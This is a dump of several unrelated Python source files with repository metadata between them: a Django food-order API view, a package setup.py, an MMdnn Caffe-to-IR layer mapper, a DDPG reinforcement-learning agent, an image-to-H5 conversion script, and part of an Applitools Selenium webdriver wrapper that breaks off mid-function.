food = store.foods.get(id=order_food['food_id'])
food_count = int(order_food['count'])
new_stock = food.stock - food_count
store.foods.filter(id=order_food['food_id']).update(stock=new_stock)
OrderFood(
count=food_count,
food=food,
order=new_order
).save()
except Exception, e:
print e
return JsonErrorResponse("Fail:" + e.message)
print "新订单id:", new_order.id
return JsonResponse({"id": new_order.id})
class OrderDetail(APIView):
def get(self, request, order_id):
try:
order = Order.objects.get(id=order_id)
except Order.DoesNotExist:
return JsonErrorResponse("Order does not exist", 404)
return JsonResponse({"order": order.to_detail_string()})
def put(self, request, order_id):
        # Update an order
try:
action = request.json.get("action")
order = Order.objects.get(id=order_id)
status = order.status
if request.account_type == "customer":
action_to_func = {"finish": order.finish}
else:
action_to_func = {
"accept": order.accept,
"transport": order.transport,
"close": order.close,
}
if action not in action_to_func:
return JsonErrorResponse("fail to action on order", 400)
action_to_func[action]()
            # Review foods and the order; allowed only once
if action == "finish" and status == "3":
order_foods = order.order_foods.all()
order_foods_food = [i.food for i in order_foods]
food_review_list = request.json.get("food_review_list", [])
                # Food reviews
data = {}
data['customer'] = request.u
data['order'] = order
for food_review in food_review_list:
try:
food = Food.objects.get(id = food_review.get("food_id"))
assert food in order_foods_food
data['food'] = food
data['content'] = food_review.get("content", "")
data['star'] = food_review.get("star", "5")
new_food_review = FoodReview(**data)
new_food_review.save()
except Exception, e:
print e.message
                # Order review
order_review = request.json.get("order_review")
data['store'] = order.store
if order_review:
if data.get('food'):
data.pop('food')
data['delivery_time'] = order_review.get("delivery_time", 120)
data['content'] = order_review.get("content", "")
data['star'] = order_review.get("star", "5")
new_order_review = OrderReview(**data)
new_order_review.save()
order_review = request.json.get("order_review")
return JsonResponse({})
except Exception, e:
return JsonErrorResponse("Update failed:" + e.message, 400)
| 39.570093
| 131
| 0.589356
|
78848376fd6712e18d054790fa8e70f6da87ea23
| 1,789
|
py
|
Python
|
setup.py
|
Ann-Holmes/CellO
|
bc2192a2d27e0859f6df885a6fc246e26e54a7b0
|
[
"MIT"
] | 42
|
2019-05-14T19:04:38.000Z
|
2022-03-06T12:57:00.000Z
|
setup.py
|
Ann-Holmes/CellO
|
bc2192a2d27e0859f6df885a6fc246e26e54a7b0
|
[
"MIT"
] | 16
|
2020-08-04T12:34:08.000Z
|
2022-03-31T22:30:48.000Z
|
setup.py
|
Ann-Holmes/CellO
|
bc2192a2d27e0859f6df885a6fc246e26e54a7b0
|
[
"MIT"
] | 6
|
2019-05-13T15:57:03.000Z
|
2022-03-18T02:17:05.000Z
|
import os
import sys
from setuptools import setup, find_packages
install_requires = [
"Cython>=0.29.17",
"quadprog>=0.1.6",
"numpy>=1.17.1",
"scikit-learn>=0.22.2.post1",
"scipy>=1.3.1",
"pandas>=0.23.4",
"dill>=0.3.1.1",
"h5py>=2.10.0",
"anndata>=0.7.1",
"matplotlib",
"pygraphviz"
]
if sys.version_info[:2] < (3, 6):
raise RuntimeError("Python version >=3.6 required.")
with open("README.rst", "r", encoding="utf-8") as fh:
readme = fh.read()
setup(
name="cello_classify",
version="2.0.3",
description="CellO",
author="Matthew N. Bernstein",
author_email="mbernstein@morgridge.org",
packages=[
"cello",
"cello.onto_lib_py3",
"cello.models",
"cello.graph_lib"
],
license="MIT License",
install_requires=install_requires,
long_description=readme,
include_package_data=True,
zip_safe=True,
url="https://github.com/deweylab/CellO",
entry_points={
'console_scripts': [
'cello_predict = cello.cello_predict:main',
'cello_train_model = cello.cello_train_model:main',
'cello_quantify_sample = cello.cello_quantify_sample:main'
]
},
keywords=[
"scRNA-seq",
"cell-type",
"cell-ontology",
"gene-expression",
"computational-biology",
],
classifiers=[
"Programming Language :: Python :: 3.6",
"License :: OSI Approved :: MIT License",
"Intended Audience :: Developers",
"Intended Audience :: Science/Research",
"Natural Language :: English",
"Operating System :: MacOS :: MacOS X",
"Operating System :: POSIX :: Linux",
"Topic :: Scientific/Engineering :: Bio-Informatics",
]
)
| 25.557143
| 70
| 0.588038
|
700607a0e3bc6a40eaa5af9ff3733a5abb9bcc35
| 9,760
|
py
|
Python
|
mmdnn/conversion/caffe/mapper.py
|
Gwinhen/MMdnn
|
6d2e83002a37acd8a31b1a2d497e3554606db00c
|
[
"MIT"
] | null | null | null |
mmdnn/conversion/caffe/mapper.py
|
Gwinhen/MMdnn
|
6d2e83002a37acd8a31b1a2d497e3554606db00c
|
[
"MIT"
] | null | null | null |
mmdnn/conversion/caffe/mapper.py
|
Gwinhen/MMdnn
|
6d2e83002a37acd8a31b1a2d497e3554606db00c
|
[
"MIT"
] | null | null | null |
from __future__ import absolute_import
from __future__ import division
import numpy as np
from mmdnn.conversion.caffe.errors import ConversionError
from mmdnn.conversion.caffe.common_graph import Node
from mmdnn.conversion.caffe.network import DEFAULT_PADDING
from mmdnn.conversion.caffe.utils import get_lower_case
from mmdnn.conversion.common.IR.graph_pb2 import TensorShape
def get_handler_name(node_kind):
return node_kind.lower() if len(node_kind) <= 4 else get_lower_case(node_kind)
class NodeMapper(object):
@classmethod
def _convert_output_shape(cls, kwargs, node):
shape = TensorShape()
dim = shape.dim.add()
dim.size = -1
if len(node.output_shape) > 2:
for i in node.output_shape[2:]:
dim = shape.dim.add()
dim.size = i
dim = shape.dim.add()
dim.size = node.output_shape.channels
else:
dim = shape.dim.add()
dim.size = node.output_shape[1]
kwargs['_output_shapes'] = [shape]
@classmethod
def get_kernel_params(cls, node, input_shape):
kwargs = {}
if node.kernel_parameters.global_pooling:
kwargs['kernel_shape'] = [1, input_shape.height, input_shape.width, 1]
kwargs['pads'] = [0] * 8
else:
from mmdnn.conversion.caffe.graph import NodeKind
if node.kind == NodeKind.Pooling:
kwargs['kernel_shape'] = [1, node.kernel_parameters.k_h, node.kernel_parameters.k_w, 1]
elif node.kind in [NodeKind.Convolution, NodeKind.Deconvolution]:
pass
else:
raise ValueError
dilation = node.parameters.dilation[0] if hasattr(node.parameters, 'dilation') and node.parameters.dilation else 1
o_h_caffe = node.output_shape.height
o_w_caffe = node.output_shape.width
ko_h = dilation * (int(node.kernel_parameters.k_h) - 1) + 1
ko_w = dilation * (int(node.kernel_parameters.k_w) - 1) + 1
if node.kind == NodeKind.Deconvolution:
o_h_tf = int(node.kernel_parameters.s_h) * (input_shape.height - 1) + ko_h - 2 * int(node.kernel_parameters.p_h)
o_w_tf = int(node.kernel_parameters.s_w) * (input_shape.width - 1) + ko_w - 2 * int(node.kernel_parameters.p_w)
else:
o_h_tf = (input_shape.height + node.kernel_parameters.p_h * 2 - ko_h + 1) // node.kernel_parameters.s_h
o_w_tf = (input_shape.width + node.kernel_parameters.p_w * 2 - ko_w + 1) // node.kernel_parameters.s_w
kwargs['pads'] = [0, node.kernel_parameters.p_h, node.kernel_parameters.p_w, 0] + \
[0, node.kernel_parameters.p_h + o_h_caffe - o_h_tf, node.kernel_parameters.p_w + o_w_caffe - o_w_tf, 0]
kwargs['strides'] = [1, node.kernel_parameters.s_h, node.kernel_parameters.s_w, 1]
cls._convert_output_shape(kwargs, node)
return kwargs
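    # Worked example of the padding arithmetic above (a sketch, not taken from any
    # model): a 3x3 Convolution with stride 1, pad 1, dilation 1 on a 224x224 input
    # gives ko_h = 3, o_h_caffe = (224 + 2*1 - 3)//1 + 1 = 224 and
    # o_h_tf = (224 + 2*1 - 3 + 1)//1 = 224, so pads = [0, 1, 1, 0, 0, 1, 1, 0].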
@classmethod
def map_data(cls, node):
# TODO: We need to identify whether this is 4D image data, otherwise we shouldn't change the dimension order
shape = TensorShape()
dim = shape.dim.add()
dim.size = -1
for i in node.output_shape[2:]:
dim = shape.dim.add()
dim.size = i
dim = shape.dim.add()
dim.size = node.output_shape.channels
kwargs = {'shape': shape} # Ignore the dimension of batch size
cls._convert_output_shape(kwargs, node)
return Node.create('DataInput', **kwargs)
@classmethod
def map_input(cls, node):
return cls.map_data(node)
@classmethod
def map_convolution(cls, node):
parent, _ = node.get_only_parent()
kwargs = cls.get_kernel_params(node, parent.output_shape)
kwargs['kernel_shape'] = [node.kernel_parameters.k_h, node.kernel_parameters.k_w, parent.output_shape.channels, node.parameters.num_output]
kwargs['use_bias'] = node.parameters.bias_term
if node.parameters.dilation:
dilation = node.parameters.dilation[0]
if dilation != 1:
kwargs['dilations'] = [1, dilation, dilation, 1]
kwargs['group'] = node.parameters.group
return Node.create('Conv', **kwargs)
@classmethod
def map_deconvolution(cls, node):
parent, _ = node.get_only_parent()
kwargs = cls.get_kernel_params(node, parent.output_shape)
kwargs['kernel_shape'] = [node.kernel_parameters.k_h, node.kernel_parameters.k_w, node.parameters.num_output, parent.output_shape.channels]
kwargs['use_bias'] = node.parameters.bias_term
if node.parameters.dilation:
dilation = node.parameters.dilation[0]
if dilation != 1:
kwargs['dilations'] = [1, dilation, dilation, 1]
kwargs['group'] = node.parameters.group
return Node.create('ConvTranspose', **kwargs)
@classmethod
def map_crop(cls, node):
kwargs = {}
cls._convert_output_shape(kwargs, node)
offset = node.parameters.offset
if offset:
if len(offset) == 1:
kwargs['border'] = [offset[0], offset[0], 0, 0]
else:
kwargs['border'] = [offset[0], offset[1], 0, 0]
return Node.create('Crop', **kwargs)
@classmethod
def map_relu(cls, node):
kwargs = {}
cls._convert_output_shape(kwargs, node)
return Node.create('Relu', **kwargs)
@classmethod
def map_p_re_lu(cls, node):
# print(node.parameters)
# assert False
kwargs = {}
# kwargs['gamma'] = 0.25
cls._convert_output_shape(kwargs, node)
return Node.create('PRelu', **kwargs)
@classmethod
def map_pooling(cls, node):
parent, _ = node.get_only_parent()
kwargs = cls.get_kernel_params(node, parent.output_shape)
if node.parameters.pool == 0:
kwargs['pooling_type'] = 'MAX'
elif node.parameters.pool == 1:
kwargs['pooling_type'] = 'AVG'
else:
# Stochastic pooling, for instance.
raise ConversionError('Unsupported pooling type.')
cls._convert_output_shape(kwargs, node)
return Node.create('Pool', **kwargs)
@classmethod
def _add_flatten_layer(cls, node):
shape = TensorShape()
dim = shape.dim.add()
dim.size = -1
dim = shape.dim.add()
dim.size = 1
for i in node.output_shape[1:]:
dim.size *= i
kwargs = {'_output_shapes' : [shape]}
return Node.create('Flatten', **kwargs)
@classmethod
def map_inner_product(cls, node):
#TODO: Axis
assert node.parameters.axis == 1
#TODO: Unbiased
kwargs = {'use_bias' : node.parameters.bias_term, 'units' : node.parameters.num_output}
# check if need the Flatten layer
parent, _ = node.get_only_parent()
ret = []
# if parent.output_shape.height > 1 or parent.output_shape.width > 1:
ret.append(cls._add_flatten_layer(parent))
ret.append(Node.create('FullyConnected', **kwargs))
return ret
@classmethod
def map_softmax(cls, node):
kwargs = {}
cls._convert_output_shape(kwargs, node)
return Node.create('Softmax', **kwargs)
@classmethod
def map_lrn(cls, node):
params = node.parameters
assert params.local_size % 2 == 1
kwargs = {'size': int((params.local_size + 1) / 2), 'alpha': params.alpha, 'beta': params.beta, 'k' : params.k}
cls._convert_output_shape(kwargs, node)
return Node.create('LRN', **kwargs)
@classmethod
def map_concat(cls, node):
kwargs = {'axis': (2, 3, 1, 0)[node.parameters.axis]}
cls._convert_output_shape(kwargs, node)
return Node.create('Concat', **kwargs)
@classmethod
def map_dropout(cls, node):
kwargs = {'keep_prob': node.parameters.dropout_ratio}
cls._convert_output_shape(kwargs, node)
return Node.create('Dropout', **kwargs)
@classmethod
def map_batch_norm(cls, node):
kwargs = {'scale' : len(node.data) >= 3, 'bias' : len(node.data) == 4}
epsilon = node.parameters.eps
kwargs['epsilon'] = epsilon
cls._convert_output_shape(kwargs, node)
return Node.create('BatchNorm', **kwargs)
@classmethod
def map_scale(cls, node):
raise NotImplementedError
# TODO: The gamma parameter has to be set (in node.data?) and this should work.
# Also, mean should be set to 0, and var to 1, just to be safe.
scale_value = float(node.parameters.filler.value)
kwargs = {'scale' : True, 'bias' : False, 'gamma' : scale_value, 'epsilon': 0}
return Node.create('BatchNorm', **kwargs)
@classmethod
def map_eltwise(cls, node):
operations = {0: 'Mul', 1: 'Add', 2: 'Max'}
op_code = node.parameters.operation
try:
return Node.create(operations[op_code])
except KeyError:
raise ConversionError('Unknown elementwise operation: {}'.format(op_code))
@classmethod
def map_abs_val(cls, node):
return Node.create('Abs')
@classmethod
def map_tanh(cls, node):
return Node.create('Tanh')
@classmethod
def map_sigmoid(cls, node):
return Node.create('Sigmoid')
@classmethod
def map_reshape(cls, node):
kwargs = {'shape' : [dim for dim in node.output_shape]}
cls._convert_output_shape(kwargs, node)
return Node.create('Reshape', **kwargs)
@classmethod
def map_flatten(cls, node):
return Node.create('Flatten')
| 36.01476
| 147
| 0.616291
|
a7609a76137663823e045ba0784ea045c4c511e3
| 7,985
|
py
|
Python
|
p2_continuous-control/ddpg_agent.py
|
ReactiveXYZ-Dev/deep-reinforcement-learning
|
074318b2a73f61d7fee7e0374c739447ee45b6a0
|
[
"MIT"
] | null | null | null |
p2_continuous-control/ddpg_agent.py
|
ReactiveXYZ-Dev/deep-reinforcement-learning
|
074318b2a73f61d7fee7e0374c739447ee45b6a0
|
[
"MIT"
] | null | null | null |
p2_continuous-control/ddpg_agent.py
|
ReactiveXYZ-Dev/deep-reinforcement-learning
|
074318b2a73f61d7fee7e0374c739447ee45b6a0
|
[
"MIT"
] | null | null | null |
import numpy as np
import random
import copy
from collections import namedtuple, deque
from model import Actor, Critic
import torch
import torch.nn.functional as F
import torch.optim as optim
BUFFER_SIZE = int(1e5) # replay buffer size
BATCH_SIZE = 128 # minibatch size
GAMMA = 0.99 # discount factor
TAU = 1e-3 # for soft update of target parameters
LR_ACTOR = 1e-4 # learning rate of the actor
LR_CRITIC = 1e-3 # learning rate of the critic
WEIGHT_DECAY = 0 # L2 weight decay
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class Agent():
"""Interacts with and learns from the environment."""
def __init__(self, state_size, action_size, random_seed):
"""Initialize an Agent object.
Params
======
state_size (int): dimension of each state
action_size (int): dimension of each action
random_seed (int): random seed
"""
self.state_size = state_size
self.action_size = action_size
self.seed = random.seed(random_seed)
# Actor Network (w/ Target Network)
self.actor_local = Actor(
state_size, action_size, random_seed).to(device)
self.actor_target = Actor(
state_size, action_size, random_seed).to(device)
self.actor_optimizer = optim.Adam(
self.actor_local.parameters(), lr=LR_ACTOR)
# Critic Network (w/ Target Network)
self.critic_local = Critic(
state_size, action_size, random_seed).to(device)
self.critic_target = Critic(
state_size, action_size, random_seed).to(device)
self.critic_optimizer = optim.Adam(
self.critic_local.parameters(), lr=LR_CRITIC, weight_decay=WEIGHT_DECAY)
# Noise process
self.noise = OUNoise(action_size, random_seed)
# Replay memory
self.memory = ReplayBuffer(
action_size, BUFFER_SIZE, BATCH_SIZE, random_seed)
def step(self, state, action, reward, next_state, done):
"""Save experience in replay memory, and use random sample from buffer to learn."""
# Save experience / reward
self.memory.add(state, action, reward, next_state, done)
# Learn, if enough samples are available in memory
if len(self.memory) > BATCH_SIZE:
experiences = self.memory.sample()
self.learn(experiences, GAMMA)
def act(self, state, add_noise=True):
"""Returns actions for given state as per current policy."""
state = torch.from_numpy(state).float().to(device)
self.actor_local.eval()
with torch.no_grad():
action = self.actor_local(state).cpu().data.numpy()
self.actor_local.train()
if add_noise:
action += self.noise.sample()
return np.clip(action, -1, 1)
def reset(self):
self.noise.reset()
def learn(self, experiences, gamma):
"""Update policy and value parameters using given batch of experience tuples.
Q_targets = r + γ * critic_target(next_state, actor_target(next_state))
where:
actor_target(state) -> action
critic_target(state, action) -> Q-value
Params
======
experiences (Tuple[torch.Tensor]): tuple of (s, a, r, s', done) tuples
gamma (float): discount factor
"""
states, actions, rewards, next_states, dones = experiences
# ---------------------------- update critic ---------------------------- #
# Get predicted next-state actions and Q values from target models
actions_next = self.actor_target(next_states)
Q_targets_next = self.critic_target(next_states, actions_next)
# Compute Q targets for current states (y_i)
Q_targets = rewards + (gamma * Q_targets_next * (1 - dones))
# Compute critic loss
Q_expected = self.critic_local(states, actions)
critic_loss = F.mse_loss(Q_expected, Q_targets)
# Minimize the loss
self.critic_optimizer.zero_grad()
critic_loss.backward()
self.critic_optimizer.step()
# ---------------------------- update actor ---------------------------- #
# Compute actor loss
actions_pred = self.actor_local(states)
actor_loss = -self.critic_local(states, actions_pred).mean()
# Minimize the loss
self.actor_optimizer.zero_grad()
actor_loss.backward()
self.actor_optimizer.step()
# ----------------------- update target networks ----------------------- #
self.soft_update(self.critic_local, self.critic_target, TAU)
self.soft_update(self.actor_local, self.actor_target, TAU)
def soft_update(self, local_model, target_model, tau):
"""Soft update model parameters.
θ_target = τ*θ_local + (1 - τ)*θ_target
Params
======
local_model: PyTorch model (weights will be copied from)
target_model: PyTorch model (weights will be copied to)
tau (float): interpolation parameter
"""
for target_param, local_param in zip(target_model.parameters(), local_model.parameters()):
target_param.data.copy_(
tau*local_param.data + (1.0-tau)*target_param.data)
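# Minimal usage sketch (assumes a Reacher-style environment and the Actor/Critic
# networks from model.py; the state/action sizes are hypothetical):
#   agent = Agent(state_size=33, action_size=4, random_seed=0)
#   action = agent.act(state)
#   agent.step(state, action, reward, next_state, done)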
class OUNoise:
"""Ornstein-Uhlenbeck process."""
def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):
"""Initialize parameters and noise process."""
self.mu = mu * np.ones(size)
self.theta = theta
self.sigma = sigma
self.seed = random.seed(seed)
self.reset()
def reset(self):
"""Reset the internal state (= noise) to mean (mu)."""
self.state = copy.copy(self.mu)
def sample(self):
"""Update internal state and return it as a noise sample."""
x = self.state
dx = self.theta * (self.mu - x) + self.sigma * \
np.array([random.random() for i in range(len(x))])
self.state = x + dx
return self.state
class ReplayBuffer:
"""Fixed-size buffer to store experience tuples."""
def __init__(self, action_size, buffer_size, batch_size, seed):
"""Initialize a ReplayBuffer object.
Params
======
buffer_size (int): maximum size of buffer
batch_size (int): size of each training batch
"""
self.action_size = action_size
self.memory = deque(maxlen=buffer_size) # internal memory (deque)
self.batch_size = batch_size
self.experience = namedtuple("Experience", field_names=[
"state", "action", "reward", "next_state", "done"])
self.seed = random.seed(seed)
def add(self, state, action, reward, next_state, done):
"""Add a new experience to memory."""
e = self.experience(state, action, reward, next_state, done)
self.memory.append(e)
def sample(self):
"""Randomly sample a batch of experiences from memory."""
experiences = random.sample(self.memory, k=self.batch_size)
states = torch.from_numpy(
np.vstack([e.state for e in experiences if e is not None])).float().to(device)
actions = torch.from_numpy(
np.vstack([e.action for e in experiences if e is not None])).float().to(device)
rewards = torch.from_numpy(
np.vstack([e.reward for e in experiences if e is not None])).float().to(device)
next_states = torch.from_numpy(np.vstack(
[e.next_state for e in experiences if e is not None])).float().to(device)
dones = torch.from_numpy(np.vstack(
[e.done for e in experiences if e is not None]).astype(np.uint8)).float().to(device)
return (states, actions, rewards, next_states, dones)
def __len__(self):
"""Return the current size of internal memory."""
return len(self.memory)
| 38.389423
| 98
| 0.608265
|
bc3446cf696d88f4cf4b566085069b49fa6168c6
| 2,219
|
py
|
Python
|
toh5.py
|
kkaatttiechang/MitoEM2021-Challenge
|
73f6d40d503d108e36a37149579e0173182e01cc
|
[
"MIT"
] | null | null | null |
toh5.py
|
kkaatttiechang/MitoEM2021-Challenge
|
73f6d40d503d108e36a37149579e0173182e01cc
|
[
"MIT"
] | null | null | null |
toh5.py
|
kkaatttiechang/MitoEM2021-Challenge
|
73f6d40d503d108e36a37149579e0173182e01cc
|
[
"MIT"
] | null | null | null |
"""
Code inspired by Donglaiw @ https://github.com/donglaiw/MitoEM-challenge
- h5_path : path to the directory from which the images will be read
- h5_name : name of the H5 file to be created (follow the instructions in
https://mitoem.grand-challenge.org/Evaluation/ to name the
files accordingly)
The H5 file should be saved in the directory where this script was called
"""
import os
import h5py
import argparse
import numpy as np
from os import path
from tqdm import tqdm
from scipy import ndimage
from skimage.io import imread
from PIL import ImageEnhance, Image
from skimage import measure, feature
def get_args():
parser = argparse.ArgumentParser(description="H5 Conversion")
    parser.add_argument('--path', type=str, help='path to the directory of images to convert')
    parser.add_argument('--name', type=str, help='name of the H5 file to create')
    parser.add_argument('--saveto', type=str, help='destination directory for the H5 file')
args = parser.parse_args()
return args
def convert_to_h5(h5_path, h5_name, h5_saveto):
img_shape = (4096, 4096)
pred_ids = sorted(next(os.walk(h5_path))[2])
    # Fall back to the challenge's expected file name when no name is given
    if not h5_name:
        h5_name = '0_human_instance_seg_pred.h5'
# Allocate memory for the predictions
pred_stack = np.zeros((len(pred_ids),) + img_shape, dtype=np.int64)
# Read all the images
for n, id_ in tqdm(enumerate(pred_ids)):
img = imread(os.path.join(h5_path, id_))
pred_stack[n] = img
# Apply connected components to make instance segmentation
pred_stack = (pred_stack / 255).astype('int64')
pred_stack, nr_objects = ndimage.label(pred_stack)
print("Number of objects {}".format(nr_objects))
# Create the h5 file (using lzf compression to save space)
h5f = h5py.File(os.path.join(h5_saveto, h5_name), 'w')
h5f.create_dataset('dataset_1', data=pred_stack, compression="lzf")
h5f.close()
def main():
args = get_args()
save2 = os.getcwd()
if args.saveto is not None: save2 = args.saveto
convert_to_h5(args.path, args.name, save2)
if __name__ == "__main__":
main()
| 36.983333
| 97
| 0.673727
|
d35533c87bfb9883f03114e0bb0e8c7eaecf5296
| 35,248
|
py
|
Python
|
applitools/selenium/webdriver.py
|
applitools/eyes.selenium.python
|
3a09a3372a3a8915b3c97ee54fc223580c45c0a3
|
[
"Apache-2.0"
] | 11
|
2016-04-20T21:21:37.000Z
|
2020-04-27T19:46:56.000Z
|
applitools/selenium/webdriver.py
|
applitools/eyes.selenium.python
|
3a09a3372a3a8915b3c97ee54fc223580c45c0a3
|
[
"Apache-2.0"
] | 15
|
2017-01-11T04:58:31.000Z
|
2019-09-13T18:00:35.000Z
|
applitools/selenium/webdriver.py
|
applitools/eyes.selenium.python
|
3a09a3372a3a8915b3c97ee54fc223580c45c0a3
|
[
"Apache-2.0"
] | 15
|
2016-03-23T22:06:39.000Z
|
2020-06-14T09:11:58.000Z
|
from __future__ import absolute_import
import base64
import contextlib
import time
import typing as tp
from PIL import Image
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.by import By
from selenium.webdriver.remote.switch_to import SwitchTo
from selenium.webdriver.remote.webdriver import WebDriver
from selenium.webdriver.support.wait import WebDriverWait
from applitools.core import logger
from applitools.core.errors import EyesError
from applitools.core.geometry import Point, Region
from applitools.utils import cached_property, image_utils, general_utils
from . import eyes_selenium_utils, StitchMode
from .positioning import ElementPositionProvider, build_position_provider_for, ScrollPositionProvider
from .webelement import EyesWebElement
from .frames import Frame, FrameChain
if tp.TYPE_CHECKING:
from applitools.core.scaling import ScaleProvider
from applitools.utils.custom_types import Num, ViewPort, FrameReference, AnyWebDriver, AnyWebElement
from .eyes import Eyes
class FrameResolver(object):
def __init__(self, frame_ref, driver):
# Find the frame's location and add it to the current driver offset
if isinstance(frame_ref, str):
frame_eyes_webelement = driver.find_element_by_name(frame_ref)
elif isinstance(frame_ref, int):
frame_elements_list = driver.find_elements_by_css_selector('frame, iframe')
frame_eyes_webelement = frame_elements_list[frame_ref]
elif isinstance(frame_ref, EyesWebElement):
frame_eyes_webelement = frame_ref
else:
# It must be a WebElement
frame_eyes_webelement = EyesWebElement(frame_ref, driver)
self.eyes_webelement = frame_eyes_webelement
self.webelement = frame_eyes_webelement.element
class _EyesSwitchTo(object):
"""
Wraps a selenium "SwitchTo" object, so we can keep track of switching between frames.
    It is named EyesTargetLocator in other SDKs.
"""
# TODO: Make more similar to EyesTargetLocator
_READONLY_PROPERTIES = ['alert', 'active_element']
PARENT_FRAME = 1
def __init__(self, driver, switch_to):
# type: (EyesWebDriver, SwitchTo) -> None
"""
Ctor.
:param driver: EyesWebDriver instance.
:param switch_to: Selenium switchTo object.
"""
self._switch_to = switch_to
self._driver = driver
self._scroll_position = ScrollPositionProvider(driver)
general_utils.create_proxy_interface(self, switch_to, self._READONLY_PROPERTIES)
@contextlib.contextmanager
def frame_and_back(self, frame_reference):
# type: (FrameReference) -> tp.Generator
self.frame(frame_reference)
yield
self.parent_frame()
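    # Usage sketch (the frame name is hypothetical; `eyes_switch_to` is assumed to be
    # an _EyesSwitchTo instance):
    #   with eyes_switch_to.frame_and_back("content-iframe"):
    #       ...  # work inside the frame, then switch back automatically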
def frame(self, frame_reference):
# type: (FrameReference) -> None
"""
Switch to a given frame.
:param frame_reference: The reference to the frame.
"""
frame = FrameResolver(frame_reference, self._driver)
self.will_switch_to_frame(frame.eyes_webelement)
self._switch_to.frame(frame.webelement)
def frames(self, frame_chain):
# type: (FrameChain) -> None
"""
Switches to the frames one after the other.
:param frame_chain: A list of frames.
"""
self._switch_to.default_content()
for frame in frame_chain:
self.frame(frame.reference)
def default_content(self):
# type: () -> None
"""
Switch to default content.
"""
self._driver.frame_chain.clear()
self._switch_to.default_content()
def parent_frame(self):
"""
Switch to parent frame.
"""
frames = self._driver.frame_chain
if frames:
frames.pop()
try:
self._switch_to.parent_frame()
except WebDriverException as e:
self._switch_to.default_content()
for frame in frames:
self._switch_to.frame(frame.reference)
def window(self, window_name):
# type: (tp.Text) -> None
"""
Switch to window.
"""
self._driver.frame_chain.clear()
self._switch_to.window(window_name)
def will_switch_to_frame(self, target_frame):
# type: (EyesWebElement) -> None
"""
Will be called before switching into a frame.
:param target_frame: The element about to be switched to.
"""
assert target_frame is not None
pl = target_frame.location
size_and_borders = target_frame.size_and_borders
borders = size_and_borders.borders
frame_inner_size = size_and_borders.size
content_location = Point(pl['x'] + borders['left'], pl['y'] + borders['top'])
original_location = self._scroll_position.get_current_position()
self._driver.scroll_to(content_location)
frame = Frame(target_frame, content_location, target_frame.size, frame_inner_size,
parent_scroll_position=original_location)
self._driver.frame_chain.push(frame)
class EyesWebDriver(object):
"""
A wrapper for selenium web driver which creates wrapped elements, and notifies us about
events / actions.
"""
# Properties require special handling since even testing if they're callable "activates"
# them, which makes copying them automatically a problem.
_READONLY_PROPERTIES = ['application_cache', 'current_url', 'current_window_handle',
'desired_capabilities', 'log_types', 'name', 'page_source', 'title',
'window_handles', 'switch_to', 'mobile', 'current_context', 'context',
'current_activity', 'network_connection', 'available_ime_engines',
'active_ime_engine', 'device_time', 'w3c', 'contexts', 'current_package',
# Appium specific
'battery_info', 'location']
_SETTABLE_PROPERTIES = ['orientation', 'file_detector']
# This should pretty much cover all scroll bars (and some fixed position footer elements :) ).
_MAX_SCROLL_BAR_SIZE = 50
_MIN_SCREENSHOT_PART_HEIGHT = 10
def __init__(self, driver, eyes, stitch_mode=StitchMode.Scroll):
# type: (WebDriver, Eyes, tp.Text) -> None
"""
Ctor.
:param driver: remote WebDriver instance.
:param eyes: A Eyes sdk instance.
:param stitch_mode: How to stitch a page (default is with scrolling).
"""
self.driver = driver
self._eyes = eyes
self._origin_position_provider = build_position_provider_for(StitchMode.Scroll, driver)
self._position_provider = build_position_provider_for(stitch_mode, driver)
        # List of frames the user switched to, and the current offset, so we can properly
# calculate elements' coordinates
self._frame_chain = FrameChain()
self._default_content_viewport_size = None # type: tp.Optional[ViewPort]
self.driver_takes_screenshot = driver.capabilities.get('takesScreenshot', False)
# Creating the rest of the driver interface by simply forwarding it to the underlying
# driver.
general_utils.create_proxy_interface(self, driver,
self._READONLY_PROPERTIES + self._SETTABLE_PROPERTIES)
for attr in self._READONLY_PROPERTIES:
if not hasattr(self.__class__, attr):
setattr(self.__class__, attr, general_utils.create_proxy_property(attr, 'driver'))
for attr in self._SETTABLE_PROPERTIES:
if not hasattr(self.__class__, attr):
setattr(self.__class__, attr, general_utils.create_proxy_property(attr, 'driver', True))
def get_display_rotation(self):
# type: () -> int
"""
Get the rotation of the screenshot.
:return: The rotation of the screenshot we get from the webdriver in (degrees).
"""
if self.platform_name == 'Android' and self.driver.orientation == "LANDSCAPE":
return -90
return 0
def get_platform_name(self):
return self.platform_name
def get_platform_version(self):
return self.platform_version
@cached_property
def platform_name(self):
# type: () -> tp.Optional[tp.Text]
return self.driver.desired_capabilities.get('platformName', None)
@cached_property
def platform_version(self):
# type: () -> tp.Optional[tp.Text]
return self.driver.desired_capabilities.get('platformVersion', None)
@cached_property
def browser_version(self):
# type: () -> tp.Optional[float]
caps = self.driver.capabilities
version = caps.get('browserVersion', caps.get('version', None))
if version:
            # convert a version with more than one dot into a float (e.g. Edge 1.23.45)
if version.find('.') != -1:
version = float(version[:version.index('.') + 2])
else:
version = float(version)
return version
@cached_property
def browser_name(self):
# type: () -> tp.Optional[tp.Text]
caps = self.driver.capabilities
return caps.get('browserName', caps.get('browser', None))
@cached_property
def user_agent(self):
try:
user_agent = self.driver.execute_script("return navigator.userAgent")
logger.info("user agent: {}".format(user_agent))
except Exception as e:
logger.info("Failed to obtain user-agent string")
user_agent = None
return user_agent
def is_mobile_device(self):
# type: () -> bool
"""
Returns whether the platform running is a mobile device or not.
:return: True if the platform running the test is a mobile platform. False otherwise.
"""
return eyes_selenium_utils.is_mobile_device(self.driver)
def get(self, url):
# type: (tp.Text) -> tp.Optional[tp.Any]
"""
Navigates the driver to the given url.
:param url: The url to navigate to.
:return: A driver that navigated to the given url.
"""
# We're loading a new page, so the frame location resets
self._frame_chain.clear()
return self.driver.get(url)
def find_element(self, by=By.ID, value=None):
# type: (tp.Text, tp.Text) -> EyesWebElement
"""
Returns a WebElement denoted by "By".
:param by: By which option to search for (default is by ID).
:param value: The value to search for.
:return: A element denoted by "By".
"""
# Get result from the original implementation of the underlying driver.
result = self.driver.find_element(by, value)
# Wrap the element.
if result:
result = EyesWebElement(result, self)
return result
def find_elements(self, by=By.ID, value=None):
# type: (tp.Text, tp.Text) -> tp.List[EyesWebElement]
"""
Returns a list of web elements denoted by "By".
:param by: By which option to search for (default is by ID).
:param value: The value to search for.
:return: List of elements denoted by "By".
"""
# Get result from the original implementation of the underlying driver.
results = self.driver.find_elements(by, value)
# Wrap all returned elements.
if results:
updated_results = []
for element in results:
